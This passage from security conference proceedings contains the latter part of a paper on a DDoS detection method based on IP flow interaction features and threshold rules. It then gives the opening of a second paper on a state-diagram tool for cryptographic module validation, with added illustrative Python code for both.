$$IFF_F = \frac{1}{M+1}\left( |S-D| + \sum_{i=1}^{S} Over(Port(SH_i)) + \sum_{i=1}^{D} Over(Port(DH_i)) \right) \qquad (1)$$

in which

$$Over(x) = \begin{cases} x & x/\Delta t > \theta \\ 0 & x/\Delta t \le \theta \end{cases}$$

helps to magnify the attack flows and increase the detection rate when random port numbers are generated; Δt is the sampling time interval and θ is the threshold, which can be assigned the maximum value of normal HF flows by a statistical method. The numerator of equation (1) quantifies the features of HFs, and the denominator quantifies the features of IFs. For normal IP flow, the number of IFs is large while the number of HFs is relatively small. Moreover, the values of Port(SH(Ai)) and Port(DH(Aj)) stay within a stationary normal range. Hence, IFF is small. For a DDoS attack flow resulting in denial of service, the number of IFs is small while the number of HFs is relatively large. Furthermore, the values of Port(SH(Ai)) and Port(DH(Aj)) may exceed the normal range. Thus, IFF is large. In every time period T, it is difficult and often impossible for a large number of IP addresses of attack flows to have the interaction feature at any detection location. Besides, network congestion caused by normal flows has something in common with DDoS attacks, but the IFF value of normal flows is stationary because they obey the TCP congestion control protocol, whereas the IFF value of attack flows is very large, as abrupt attack flows do not obey TCP congestion control. Therefore, IFF is helpful for distinguishing the attack flow from normal flows.
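Definitions 1 and 2 and Eq. (1) computed over a constructed packet window, as an added example (not the paper's implementation). Packets are (t, s, sp, d, dp) tuples as in Sect. 3. One point the definitions leave open is which ports Port(.) counts; this example counts the distinct port numbers in both the source and destination fields of the half flow, which is an interpretation of this example. The sample traffic, Δt = 0.1 s and θ = 50 are constructed values.

```python
"""IP Flow Interaction Feature (IFF): Definitions 1-2 and Eq. (1)."""
from collections import defaultdict
from typing import Dict, List, Tuple

Packet = Tuple[float, str, int, str, int]   # (t_i, s_i, sp_i, d_i, dp_i) as in Sect. 3


def classify(packets: List[Packet]):
    """Definition 1: the IPS(A)/IPD(A) classes and the IF, SH and DH address lists."""
    ips: Dict[str, List[Packet]] = defaultdict(list)   # packets whose source is A
    ipd: Dict[str, List[Packet]] = defaultdict(list)   # packets whose destination is A
    for p in packets:
        ips[p[1]].append(p)
        ipd[p[3]].append(p)
    ifs = [a for a in ips if a in ipd]        # A both sends and receives: IF(A)
    shs = [a for a in ips if a not in ipd]    # A only sends: SH(A)
    dhs = [a for a in ipd if a not in ips]    # A only receives: DH(A)
    return ips, ipd, ifs, shs, dhs


def port_count(pkts: List[Packet]) -> int:
    """Port(.): number of distinct port numbers in a half flow. This example
    counts both source and destination ports (an interpretation of Definition 1)."""
    return len({p[2] for p in pkts} | {p[4] for p in pkts})


def over(x: int, dt: float, theta: float) -> int:
    """Over(x) = x if x/Δt > θ else 0: keeps only half flows whose port rate is
    abnormal, so normal one-sided traffic (e.g. an unanswered DNS query) drops out."""
    return x if x / dt > theta else 0


def iff(packets: List[Packet], dt: float, theta: float) -> float:
    """Eq. (1): IFF = (|S-D| + Σ Over(Port(SH_i)) + Σ Over(Port(DH_i))) / (M+1)."""
    ips, ipd, ifs, shs, dhs = classify(packets)
    m, s, d = len(ifs), len(shs), len(dhs)
    total = abs(s - d)
    total += sum(over(port_count(ips[a]), dt, theta) for a in shs)
    total += sum(over(port_count(ipd[a]), dt, theta) for a in dhs)
    return total / (m + 1)


# Constructed sample window of Δt = 0.1 s. Normal traffic: two request/reply
# exchanges (IFs) plus two DNS queries whose answers fall outside the window.
NORMAL: List[Packet] = [
    (0.00, "10.0.0.1", 40000, "10.0.0.9", 80),
    (0.01, "10.0.0.9", 80, "10.0.0.1", 40000),
    (0.02, "10.0.0.2", 40001, "10.0.0.9", 443),
    (0.03, "10.0.0.9", 443, "10.0.0.2", 40001),
    (0.04, "10.0.0.3", 53000, "192.0.2.53", 53),
    (0.05, "10.0.0.4", 53001, "192.0.2.53", 53),
]
# Attack-like traffic: one normal exchange survives, while four sources send
# the victim 10.0.0.9 packets with ever-changing ports and never get a reply.
ATTACK: List[Packet] = NORMAL[:2] + [
    (0.01 * i, f"198.51.100.{i % 4 + 1}", 1000 + i, "10.0.0.9", 2000 + i)
    for i in range(12)
]

if __name__ == "__main__":
    print("normal IFF:", iff(NORMAL, dt=0.1, theta=50))   # 0.25
    print("attack IFF:", iff(ATTACK, dt=0.1, theta=50))   # 28/3
```

In the normal window the two unanswered DNS queries form SH flows and the resolver forms a DH flow, but their port rates (20 and 30 ports per second) stay under θ, so only |S−D| = 1 survives and the three IFs in the denominator keep IFF at 0.25. In the attack window M shrinks to 2 while four SH flows each contribute 6 ports above θ, and IFF rises to 28/3.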
4 Attack Detection Method
Assume the threshold of IFF for normal flows to be Y; then IFF ≤ Y represents the normal flow and IFF > Y the abnormal flow. However, the detecting sensor may sit under large normal background network flows or near the DDoS attack sources, and normal flows may show abnormal changes at times, so the detection model needs to be improved. Using IFF time series, we propose a simple but effective detection method, DASA.
4.1 Attack Detection Model
Sample the normal network flow F with a time interval Δt and calculate the IFF for each sample. After N samples, a time series sample of IFF is obtained, A(N, Δt) = {IFF_i, i = 1, 2, …, N}, where N is the length of the series. Let IFF_i = a_i, i = 1, 2, …, N, and use the sliding average method to eliminate the random noise of sample A:

$$A_t = \frac{1}{2h+1} \sum_{i=-h}^{h} a_{t-i} \qquad (2)$$

A_t is the sliding average value at point t and h is the single-side smoothing distance. In order to avoid filtering out useful information along with the noise, h should not be too large; we let h = 1. Assume that A'_{h+1}, A'_{h+2}, …, A'_n are obtained from a_1, a_2, …, a_n by the sliding average method. Calculate the average value mean(A'_{h+1}, A'_{h+2}, …, A'_n), denoted Mean, which is used as the threshold of normal flows. Calculate the maximum value max(A'_{h+1}, A'_{h+2}, …, A'_n), denoted Max, which is used as the threshold of abnormal flows.
Definition 3. The network flow states are divided into three states by using IFF. If IFF ≤ Mean, the network flow state is called Health State. If Mean < IFF ≤ Max, the network flow state is called Quasi Health State. If IFF > Max, the network flow state is called Abnormal State. The normal network flow state changes mainly between Health State and Quasi Health State, and sometimes between Health State and Abnormal State, but when an attack occurs, the network flow state moves from Quasi Health State into Abnormal State. Hence, we propose the attack detection model (ADM), which is defined as follows:
$$\forall i,\ i > 1:\ G(a_{i-1}, Mean) \wedge G(a_i, Max) \rightarrow F(a_i) \qquad (3)$$

where i = 2, …, n, G(x, y) denotes x > y, and F(x) denotes that x contains attack flows. Rule (3) states that a_i contains attack flows if a_{i−1} > Mean and a_i > Max. In order to increase the detection precision, we propose a correction method for detection error and compensation, which is defined as follows:

$$\forall i,\ i > 1:\ F(a_i) \wedge G(a_{i-1}, Max) \rightarrow F(a_{i-1}) \qquad (4)$$

where i = 2, …, n. Rule (4) states that a_{i−1} contains attack flows if a_i contains attack flows and a_{i−1} > Max.
4.2 Adaptive Dual Detection Threshold Estimate Algorithm
The detection threshold values can be obtained by the algorithm given in Table 1. If the result calculated by the algorithm is not satisfactory, the initial parameter values may be adjusted; for example, let max equal the maximum value among {a_1, a_2, …, a_n}.
4.3 Alarm Evaluation Mechanism
In order to decrease the false alarm rate caused by network noise, congestion and other reasons, we adopt an alarm evaluation mechanism based on al arm frequency and time interval: a DDoS attack alarm is generated after Num (Num ≥ 1) anomalies are detected within a designated time interval ΔT (ΔT ≥ 0). Larger ΔT and Num decrease the risk of false alarms, but the time efficiency decreases too.
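The detection model of Sects. 4.1 to 4.3 end to end, as an added example (not the paper's implementation): the sliding average of Eq. (2) with h = 1, Mean and Max taken from the smoothed normal-flow series, the three-state partition of Definition 3, rules (3) and (4), and the Num/ΔT alarm evaluation. The adaptive threshold search of Table 1 is not reproduced; Mean and Max are used directly. The IFF series are constructed values, and ΔT is expressed in samples (ΔT/Δt), which is a choice of this example.

```python
"""DASA: Eq. (2), Definition 3, rules (3)-(4) and the alarm evaluation of Sect. 4.3."""
from statistics import mean
from typing import List, Tuple


def sliding_average(a: List[float], h: int = 1) -> List[float]:
    """Eq. (2): A_t = (1/(2h+1)) * Σ_{i=-h..h} a_{t-i}, for every t where the window fits."""
    return [sum(a[t - h:t + h + 1]) / (2 * h + 1) for t in range(h, len(a) - h)]


def thresholds(normal_iff: List[float], h: int = 1) -> Tuple[float, float]:
    """Mean (normal threshold) and Max (abnormal threshold) of the smoothed
    normal-flow series, as Sect. 4.1 defines them."""
    smoothed = sliding_average(normal_iff, h)
    return mean(smoothed), max(smoothed)


def state(x: float, mean_thr: float, max_thr: float) -> str:
    """Definition 3: the three-state partition."""
    if x <= mean_thr:
        return "health"
    if x <= max_thr:
        return "quasi-health"
    return "abnormal"


def detect(series: List[float], mean_thr: float, max_thr: float) -> List[bool]:
    """Rule (3): flag a_i when a_{i-1} > Mean and a_i > Max, i.e. the flow moves
    from (at least) Quasi Health State into Abnormal State.
    Rule (4): walking backwards, also flag a_{i-1} when a_i is flagged and
    a_{i-1} > Max; this recovers an onset sample that rule (3) missed because
    the sample before it was still in Health State."""
    n = len(series)
    flagged = [False] * n
    for i in range(1, n):
        if series[i - 1] > mean_thr and series[i] > max_thr:
            flagged[i] = True
    for i in range(n - 1, 0, -1):
        if flagged[i] and series[i - 1] > max_thr:
            flagged[i - 1] = True
    return flagged


def alarms(flagged: List[bool], num: int = 1, window: int = 0) -> List[int]:
    """Alarm evaluation (Sect. 4.3): raise an alarm once Num anomalies fall
    within ΔT, given here in samples. Pending anomalies are cleared after each
    alarm so that one burst does not alarm repeatedly (a choice of this example)."""
    raised, pending = [], []
    for i, is_anomaly in enumerate(flagged):
        if not is_anomaly:
            continue
        pending = [j for j in pending if i - j <= window] + [i]
        if len(pending) >= num:
            raised.append(i)
            pending = []
    return raised


# Constructed IFF series (sampling interval Δt = 0.1 s): a normal-flow training
# series and an observed series whose samples 2-4 carry an attack.
NORMAL_IFF = [0.20, 0.30, 0.25, 0.40, 0.30, 0.35, 0.50, 0.30, 0.20, 0.30]
OBSERVED_IFF = [0.30, 0.20, 0.50, 9.00, 12.00, 0.35, 0.30]


def run() -> dict:
    mean_thr, max_thr = thresholds(NORMAL_IFF)
    flagged = detect(OBSERVED_IFF, mean_thr, max_thr)
    return {
        "mean": mean_thr, "max": max_thr,
        "states": [state(x, mean_thr, max_thr) for x in OBSERVED_IFF],
        "flagged": flagged,
        "alarms_num1": alarms(flagged),                    # ΔT = 0, Num = 1 (as in Sect. 5.2)
        "alarms_num2": alarms(flagged, num=2, window=1),   # two anomalies within one sample
    }


if __name__ == "__main__":
    print(run())
```

Sample 2 of the observed series is the case rule (4) exists for: its predecessor (0.20) is in Health State, so rule (3) alone would only flag samples 3 and 4; the backward correction then flags sample 2 because it already exceeds Max and the next sample is an attack.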
Table 1. Adaptive dual detection threshold estimate algorithm
Algorithm 1. The adaptive dual detection threshold estimate algorithm
Input: an initial sample A; A' (A_{h+1}, A_{h+2}, …, A_n) of A; the Mean of A'; the Max of A'; a stopping criterion C; DT_Max; an ideal false alarm rate IFA.
Output: the normal detection threshold DT_Mean, the abnormal detection threshold DT_Max, the real false alarm rate RFA, and the graph of the change of RFA as DT_Mean and DT_Max increase.
Processing procedure:
1. Initialize related variables;
2. DT_Mean = Mean;
3. While (criterion C is not satisfied) {
4. Initialize related variables;
5. DT_Max = DT_Mean;
6. While (RFA
5 Experiments and Results
In this paper, the datasets include the 1999 normal datasets and the 2000 DDoS attack dataset LLDoS 2.0.2 [14] from MIT Lincoln Lab, and a normal flow dataset captured at the backbone network of a university with a bandwidth of 10G.
5.1 Experiments and Results about IFF Algorithm
We sampled from the MIT normal dataset and calculated the IFF time series and the number of packets of the IFFs' traffic. The results are depicted in Fig. 1. In the same way, the results captured at the university backbone network are depicted in Fig. 2, and the results from the MIT attack dataset are depicted in Fig. 3. From Figs. 1, 2 and 3 we can see that IFF reflects well the different state characteristics of normal network flow and DDoS attack flow. As depicted in Fig. 3, there are a few IFFs whose size is smaller than the size of the attack traffic; the main reason is that the few normal flows that were responded to become IFs.
Fig. 1. IFF time series of 1999 normal flow [two panels; y-axis: Size; legend: Size of Normal Traffic, IFF of Normal Flow; x-axis: Time Sample Point (1/0.01s) and (1/0.1s)]
Fig. 2. Normal flow of the university backbone network [y-axis: Size; legend: Size of Normal Traffic, IFF of Normal Flow; x-axis: Time Sample Point (1/0.1s)]
Fig. 5. Comparison of different detection methods [y-axis: False Alarm Rate and Detection Rate (%); x-axis: Increase Multiple of Network Flow, 1 to 10; legend: False Alarm Rate and Detection Rate of DASA-based IFF, of SVM-based IFF, and of SVM-based EFD]
Fig. 3. IFF time series of LLDoS2.0.2 network flow [two panels; y-axis: Size; legend: IFF of Attack Flow, Size of Attack Traffic; x-axis: Time Sample Point (1/0.01s) and (1/0.1s)]
Fig. 4. IFF time series of LLDoS2.0.2-Outside network flow [two panels; y-axis: Size; legend: IFF of Attack Flow, Size of Attack Traffic; x-axis: Time Sample Point (1/0.01s) and (1/0.1s)]
We simulated the attack flows sent by "Zombies" in an indirect DDoS attack [13] using MIT LLSDDOS2.0.2-Outside.dump. Figure 4 shows that, for an indirect DDoS attack, IFF also reflects the different state characteristics of the attack flows. Thus, IFF can be used as a general DDoS attack diagnosis feature.
5.2 Experiments and Results on the DASA Method
We compared the IFF algorithm with an SVM classifier (IFF-SVM) against previous similar work, namely the Entropy of Feature Distributions (EFD) algorithm [7] with an SVM classifier (EFD-SVM). Moreover, we compared the IFF-based DASA method (IFF-DASA) with the IFF-based SVM method (IFF-SVM) under the same conditions. Additionally, to be fair to both methods, the abnormal alarm time interval ΔT was set to zero and the number of anomalies Num was set to one. The sampling period Δt was 0.1s, the normal flows were from the MIT normal datasets, and the abnormal flows were mixtures of multiple MIT normal datasets and MIT attack datasets. In Figure 5 the vertical axis represents the detection rate and the false alarm rate, and the horizontal axis represents the multiple by which the amount of normal packets exceeds the amount of attack packets. As the normal background network flows increase, the detection rate of the IFF-SVM method drops from
182
J. Cheng et al.
100% to 98.2%, with an average detection rate of 95.0%. The results demonstrate that the IFF-SVM method can effectively identify abnormal flows containing DDoS attack flows, and that it is insensitive to large normal background flows. The main reason for false negatives is that the number of IF flows increases with the increase of normal flows, which disturbs the extraction of the network-state features caused by the attack flows and reduces the detection rate. The false alarm rate of the IFF-SVM method increases from 0.0% to 1.5%, with an average false alarm rate of 1.3%. The results show that the IFF-SVM method can effectively identify normal flow and does not lead to high false positives. The main reasons for false positives are two: (1) random network noise; (2) network delay and packet loss. IFF is designed to extract the interaction features of network flow on IP addresses and ports using a one-dimensional characteristic vector; it helps to separate abnormal flows from normal flows effectively and to calculate their characteristic values separately. EFD is designed to extract the feature distributions of the IP addresses and ports of DDoS attack flows using a four-dimensional characteristic vector, and it calculates the feature values without distinguishing normal flows from abnormal flows. By comparison, the IFF algorithm gives lower false negatives and false positives. As depicted in Figure 5, for the IFF-DASA method, as the normal background network flows increase, the detection rate drops from 100% to 98.0%, with an average detection rate of 94.3%, and the false alarm rate of the DASA method is 0.0% in every test. The results show that the IFF-DASA method has the same detection rate and a lower false alarm rate compared with the IFF-SVM method. The IFF-SVM method detects the IFF of the current network flows in isolation, whereas the IFF-DASA method detects the IFF of the current network flows by associating it with the former states of IFF.
Therefore, the IFF-DASA method makes good use of the IFF feature and accurately detects DDoS attacks under large normal background network flows. In addition, we repeated the experiments above on the normal dataset of the university bone-net and the MIT attack dataset. We generated the abnormal flow samples by mixing the normal flows with some attack packets in every sampling period Δt (the sampling period Δt was set to 0.1s for normal flows; the flooding packet rate is the number of packets per 0.1 second). The results are shown in Table 2, where DR is the detection rate, FR is the false alarm rate and Rate is the flooding packet rate; the normal flows are the same in each experiment. The IFF-DASA method has the lowest false alarm rate and the highest detection rate of the three methods in Table 2.

Table 2. Comparison of different detection methods (%)
Rate (pkt/0.1s)   IFF-DASA        IFF-SVM         EFD-SVM
                  DR      FR      DR      FR      DR      FR
120               97.1    0.0     85.6    0.3     84.1    0.0
180               100.0   0.0     100.0   0.3     94.9    0.0
240               100.0   0.0     100.0   0.3     97.9    0.0
300               100.0   0.0     100.0   0.3     99.4    0.0
360               100.0   0.0     100.0   0.3     100.0   0.0
In summary, IFF can be used as a good general DDoS attack diagnosis feature. The DASA method makes good use of the IFF feature and realizes fast and efficient real-time DDoS attack detection.
6 Conclusions
This paper proposes a new IP Flow Interaction Behavior Feature (IFF) algorithm. Using the IFF time series of the network flow, the network flow states are defined as Health State, Quasi-Health State, and Abnormal State. Based on these three network states, we propose an efficient DDoS detection method (DASA). The DASA method employs an adaptive dual detection threshold estimation algorithm and an alarm evaluation mechanism to improve detection quality. Analysis and experiments show that IFF reflects the interaction characteristics of normal flows and the essential features of a DDoS attack, and that it is a good general DDoS attack diagnosis feature; DASA can effectively distinguish normal flows from abnormal flows containing DDoS attack flow, and it realizes fast detection with a high detection rate and a low false positive rate.
Acknowledgments. This work is supported by the National Science Foundation of China (60970034, 60603062, 60603015), the Scientific Research Fund of Hunan Provincial Education Department (07C718), the Foundation for the Author of National Excellent Doctoral Dissertation (2007B4), the Science Foundation of Hunan Province (06JJ3035), the Application of Innovation Plan Fund of the Ministry of Public Security (2007YYCXHNST072), and the Postdoctoral Science Foundation of Central South University.
References
1. Handley, M.: DoS-resistant Internet subgroup report. Internet Architecture WG (2005)
2. Kumar, V., Jayalekshmy, P., Patra, G., et al.: On Remote Exploitation of TCP Sender for Low-Rate Flooding Denial-of-Service Attack. IEEE Communications Letters (2009)
3. Cheng, C., Kung, H., Tan, K.: Use of spectral analysis in defense against DoS attacks. In: Proceedings of IEEE GLOBECOM (2002)
4. Lakhina, A., Crovella, M., Diot, C.: Diagnosing Network-Wide Traffic Anomalies. In: Proceedings of ACM SIGCOMM, Portland, Oregon, USA (2004)
5. Abdelsayed, S., Glimsholt, D., Leckie, C., et al.: An efficient filter for denial-of-service bandwidth attacks. In: Proceedings of the 46th IEEE GLOBECOM (2003)
6. Mirkovic, J., Reiher, P.: D-WARD: A Source-End Defense Against Flooding Denial-of-Service Attacks. IEEE Trans. on Dependable and Secure Computing (2005)
7. Lakhina, A., Crovella, M., Diot, C.: Mining Anomalies Using Traffic Feature Distributions. In: Proceedings of ACM SIGCOMM, Philadelphia, Pennsylvania, USA (2005)
8. Peng, T., Leckie, C., Kotagiri, R.: Proactively detecting distributed denial of service attacks using source IP address monitoring. In: Proceedings of the Third International IFIP-TC6 Networking Conference (2004)
9. Forrest, S., Hofmeyr, S.: Architecture for an artificial immune system. Evolutionary Computation 7(1), 45–68 (1999)
10. Vitaly, S., Ming, W.: Security against probe-response attacks in collaborative intrusion detection. In: Proceedings of ACM SIGCOMM (2007)
11. Cheng, J., Yin, J., Liu, Y., et al.: Detecting Distributed Denial of Service Attack Based on Address Correlation Value. Journal of Computer Research and Development (2009)
12. Cheng, J., Yin, J., Liu, Y., et al.: DDoS Attack Detection Algorithm using IP Address Features. In: Deng, X., Hopcroft, J.E., Xue, J. (eds.) FAW 2009. LNCS, vol. 5598. Springer, Heidelberg (2009)
13. Cheng, J., Yin, J., Wu, C., et al.: DDoS Attack Detection Method Based on Linear Prediction Model. In: Huang, D.-S., et al. (eds.) ICIC 2009. LNCS, vol. 5754, pp. 1004–1013. Springer, Heidelberg (2009)
14. http://www.ll.mit.edu/mission/communications/ist/corpora/ideval/data/index.html
A Development of Finite State Machine Create Tool for Cryptography Module Validation Jae-goo Jeong, Seung-yong Hur, and Gang-Soo Lee Hannam University, Computer Engineering Ojeong dong 133, Daejeon, Korea [email protected], [email protected], [email protected]
Abstract. The CMVP is a system for the objective evaluation of cryptographic modules; its evaluation activities are driven by the security function requirements of the CMVP. The finite state model (FSM) is the model that a cryptographic module uses for testing activities. It must be tested and modeled, but no modeling method exists in the CMVP guidance, so FSM modeling depends only on the developer's experience. Thus, in this paper, we describe an FSM modeling and validation method, and we develop an FSM creation tool.
Keywords: CMVP, Finite State Machine, Validation, State Chart Diagram.
1 Introduction
Information systems should use cryptographic modules to provide information security for users. These cryptographic modules exist as hardware and in various other forms, and software, firmware, Commercial off the Shelf (COTS) and Government off the Shelf (GOTS) products are developed at present. The Cryptographic Module Validation Program (CMVP) was established in the US and Canada in 1995 to give users access to the products they require, with confidence in the result obtained through verification by evaluators. This system validates and tests whether a cryptographic module correctly fulfils the requirements of its level. When a cryptographic module is evaluated, the FSM must be modeled so that its active states can be judged correct and its behaviour consistent. But at present there is no definite guide for FSM modeling, and modeling depends entirely on the developer's experience. Also, the FSM is not generally made public, and a verification method for the model has not appeared fully. Therefore, in this paper, we survey a general modeling method for the FSM through CMVP security policy documents, and we present a verification method for the modeled states. Also, we present a method that helps cryptographic module developers and evaluators by using an FSM modeling support tool.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 185–192, 2009. © Springer-Verlag Berlin Heidelberg 2009
186
J.-g. Jeong, S.-y. Hur, and G.-S. Lee
The organization of this paper is as follows: Chapter 1 explains the concept of the CMVP and the definition and form of the finite state model. Chapter 3 explains the modeling method for the finite state model. Chapter 4 introduces and explains the support tool for state diagram modeling. Finally, Chapter 5 gives the conclusion and future work.
2 Cryptographic Module Validation and FSM
2.1 What Is the CMVP?
The CMVP makes information security systems trustworthy and objectively evaluated. Thus, testing is performed through testing laboratories. This program is already used by various countries such as the US, Canada, Korea, and Japan [4] [7]. FIPS 140-2 is the cryptographic module validation guidance; it has ten validation function requirements and classifies security levels from 1 to 4 [1]. The CMVP security requirement classes are as follows:
- Cryptographic module specification
- Cryptographic module ports and interfaces
- Roles, services, and authentication
- Finite state model
- Physical security
- Operational environment
- Cryptographic key management
- Self-tests
- Design assurance
- Mitigation of other attacks
2.2 Relation between the CMVP and the FSM
The FSM consists of finite states and transitions, and it is a state model that changes to another state in response to outside stimulation. For cryptographic validation, FIPS 140-2 (the guidance for cryptographic module validation) has the following requirement specification for FSM validation [2]:
1. Power on/off states
2. Crypto officer states
3. CSP/PSP (Critical Security Parameter) entry states
4. User states
5. Self-test states
6. Error states
7. Bypass state [optional]
8. Quiescent state [optional]
3 Modeling on the FSM
FIPS 140-2 has no detailed modeling guide for the FSM in its cryptographic module validation and testing guidance, because the FSM is a secret of the developer's cryptographic module and FSMs come in many kinds. In this paper, we analyze the SP (security policy) for a cryptographic module as used by developers and evaluators, and we present FSM modeling methods.
A Development of Finite State Machine Create Tool
187
3.1 Method of State Diagram Modeling
(1) Modeling on the State Transition Table
The 'state transition table' is used for the CMVP's FSM validation. The table lists each 'state' with its 'Input (entry)', 'Output (Do/Action)' and 'Next State', taken from the CMVP evaluation deliverables. Table 1 shows the template of the standard state transition table.

Table 1. Template of the standard state transition table (* = standard state)
composite state          detailed state                                                   event (input)        Do/action (output)    next state
power                    power-on*                                                        "Write on events"    "Write on outputs"    "Write on next state"
                         power-off*
crypto officer*          cryptographic initialize*
                         preliminary activation
                         activation
                         non-activation
                         key management: destroyed, damaged; destroyed, damaged
user*                    execution for cryptography calculations
                         execution for target of validation by protection function
                         execution for target of non-validation by protection function
entry*                   key entry
                         CSP entry
self-test*               self-test
error*                   hard error (try to encrypt without crypto key and CSP)
                         soft error
bypass* (optional)
maintenance* (optional)
(2) Modeling Using the Relation of Each State
In this section we present the relations between states (e.g. reflection, parallel, selection). Table 2 shows examples of the relations between states.

Table 2. Examples of the relations between states
Relation                        Example                                                                                  Modeling
Reflection state (S_R)          This state returns to the 'activate state' again.
Symmetry or toggle (S ⇔ S')     'Power on'/'power off' state, 'target of validation'/'target of non-validation', etc.     S' = T(S, t), S = T(S', t'), S' = T(T(S', t'), t)
Consequence state (S ⇒ S')      'Test' is the cause; 'Test error' is the effect. It is the same as a consequence.         S' = T(S, t)
Parallel state (S ∥ S')         Each state is begun at the same time.                                                    Modeled with 'fork/join'
Selection state (S ⊕ S')        One state is selected and then activated.
(3) Modeling Based on the Life-Cycle Process
In this model the cryptographic module's operation is taken from the life-cycle process and modeled by the cryptographic module's 'states' and 'transitions'. This method helps users make a state diagram concisely. Figure 1 shows an example of modeling based on the life-cycle process. It separates each active state from each hold state, and it expresses the cryptographic module from the creation state to the exit state.
Fig. 1. Example of modeling based on Life-cycle process
3.2 Validation Checklist for the State Diagram
FSM validation must be carried out, and it is executed repeatedly during the modeling phase in the CMVP. Thus, in this chapter, we categorize the verification attributes following the FIPS 140-2 DTR and propose the following validation checklist:
(1) Correctness & Completeness
- Has the developer modeled all attributes of the cryptographic module in the state diagram/state transition table?
- Has the developer modeled only one state at a time?
- Do all states and transitions have different names?
- Do exception instances appear properly?
(2) Reachability
- From the initial state, can the FSM reach all states through reasonable transitions?
- Does the FSM avoid reaching unreasonable end and critical states?
(3) Consistency
- Does the state diagram/state transition table keep consistency with the developer documentation?
- Do the state diagram and the cryptographic module keep consistency in their operations?
(4) Redundancy & Conflict
- Are the states free of redundancy with each other?
- Do outside transitions conflict with inside transitions?
- Do outside transitions conflict with complete transitions?
3.3 TTP and CYC Creation for State Diagram Validation
(1) Calculating the Number of CYC
To estimate the 'complexity' of the cryptographic module's transition paths and the number of 'transitions' [9], we use the Cyclomatic Number (CYC). The CYC is the same as the number of 'closed spaces', and CYC is calculated as follows:
CYC = the number of transitions − the number of states + 2

For the state diagram's validation, the diagram should be tested from the initial state to the end state through the Test Transition Paths (TTP), whose number is given by CYC.

(2) Method of Creating the TTP
The TTP is a path that tests all transitions of the state diagram. To create the TTPs, we propose the 'algorithm for TTP creation'. The algorithm handles the 'symmetric state' and the 'reflection transition' separately; because the algorithm is non-deterministic, the resulting TTP may differ from run to run. The algorithm of TTP creation is as follows:

[Algorithm of create TTP]
while (a 'symmetric state' or a 'reflection state' exists in the state diagram) do
  case 'symmetric state':
    S and S' = symmetric states (toggle states);
    T1 = transition that goes from S to S';
    T2 = transition that goes from S' to S;
    print S-T1-S'-T2-S;      // unnamed T1, T2 are output as '*'
    delete T1 and T2 from the state diagram;
    count = count + 1;
  case 'reflection state':
    S = reflection state;
    print S-T-S;             // T is the reflection transition of S
    delete T from the state diagram;
    count = count + 1;
end
while (a transition exists in the state diagram) do
  while (a cycle or a transition of S exists in the state diagram) do
    S = a state that has a transition;
    S' = the state linked by a transition of S;
    print S-T-S';            // T is the transition from S to S'
    delete T from the state diagram;
    S = S';
  end
  remove consecutive repetitions in the output; print newline;
  count = count + 1;
end
CYC = the number of transitions − the number of states + 2   // cyclomatic number of the state diagram
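As an added example (not the authors' CM-Statechart tool or any code from the paper), the following Python script applies the CYC formula and the three phases of the TTP creation procedure above to a small constructed state diagram, and also implements the reachability item of the Section 3.2 checklist. All state and transition names are hypothetical, constructed for the example.

```python
# Added example (not the paper's CM-Statechart code): CYC, TTP creation and a
# reachability check for a small constructed cryptographic-module state diagram.
from collections import defaultdict

# Constructed toy FSM as (source state, transition name, target state).
# All state and transition names here are hypothetical.
TRANSITIONS = [
    ("power-off", "power_on", "power-on"),
    ("power-on", "power_off", "power-off"),       # symmetric (toggle) with the line above
    ("power-on", "start_self_test", "self-test"),
    ("self-test", "test_pass", "user"),
    ("self-test", "test_fail", "error"),
    ("user", "encrypt", "user"),                  # reflection transition (S -> S)
    ("user", "key_entry", "entry"),
    ("entry", "key_loaded", "user"),              # symmetric with key_entry
    ("error", "reset", "power-off"),
]


def states_of(transitions):
    """Set of all states named by the transition list."""
    return {s for s, _, d in transitions} | {d for s, _, d in transitions}


def cyclomatic_number(transitions):
    """CYC = #transitions - #states + 2 (McCabe's formula used in Section 3.3)."""
    return len(transitions) - len(states_of(transitions)) + 2


def generate_ttp(transitions):
    """Build Test Transition Paths following the three phases of the
    'algorithm of create TTP': symmetric pairs, reflection loops, then a walk
    over whatever transitions remain.  Each path is [S, T, S', T', S'', ...]."""
    remaining = list(transitions)
    paths = []
    # Phase 1: symmetric states S -T1-> S' -T2-> S; both transitions are removed.
    found = True
    while found:
        found = False
        for t in list(remaining):
            s, name, d = t
            if s == d:
                continue                          # a loop is handled in phase 2
            back = next((u for u in remaining if u[0] == d and u[2] == s), None)
            if back is not None:
                paths.append([s, name, d, back[1], s])
                remaining.remove(t)
                remaining.remove(back)
                found = True
                break
    # Phase 2: reflection transitions S -T-> S.
    for t in list(remaining):
        if t[0] == t[2]:
            paths.append([t[0], t[1], t[0]])
            remaining.remove(t)
    # Phase 3: take any remaining transition and keep following transitions out
    # of the reached state until none is left; each walk becomes one path.
    while remaining:
        s, name, d = remaining.pop(0)
        path = [s, name, d]
        cur = d
        while True:
            nxt = next((u for u in remaining if u[0] == cur), None)
            if nxt is None:
                break
            remaining.remove(nxt)
            path += [nxt[1], nxt[2]]              # states are shared at the junction,
            cur = nxt[2]                          # so no consecutive repetition arises
        paths.append(path)
    return paths


def unreachable_states(transitions, initial):
    """Reachability item of the Section 3.2 checklist: states that the FSM
    cannot reach from `initial` by following transitions."""
    adj = defaultdict(list)
    for s, _, d in transitions:
        adj[s].append(d)
    seen, stack = {initial}, [initial]
    while stack:
        for d in adj[stack.pop()]:
            if d not in seen:
                seen.add(d)
                stack.append(d)
    return states_of(transitions) - seen


if __name__ == "__main__":
    print("CYC =", cyclomatic_number(TRANSITIONS))
    for p in generate_ttp(TRANSITIONS):
        print("-".join(p))
    print("unreachable:", unreachable_states(TRANSITIONS, "power-off"))
```

For the constructed diagram (9 transitions, 6 states) CYC is 5, and the procedure yields five paths that together cover every transition exactly once; the paper's non-determinism shows up here as the dependence of the paths on the order of the transition list.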
4 Implementation of the State Diagram Creation Tool
We developed 'CM-Statechart' for drawing the cryptographic module's FSM. CM-Statechart was developed with 'StarUML' [10], an open source 'UML' creation tool. Figure 2 shows the function structure of CM-Statechart. Figure 3 shows an example of CM-Statechart, reflecting the structure of CM-Statechart and an example of CM-statecharts.
Fig. 2. Functions structure of CM-Statecharts
Fig. 3. CM-Statecharts
5 Conclusion and Future Work
The cryptographic module validation program must verify the finite state machine, but it does not have a method for doing so. So, in this paper, we survey the FSM specification method for cryptographic module validation, show FSM modeling validation through the SP documents, and develop a method for FSM specification and an FSM creation tool based on UML 2.0. Our results and future work are as follows:
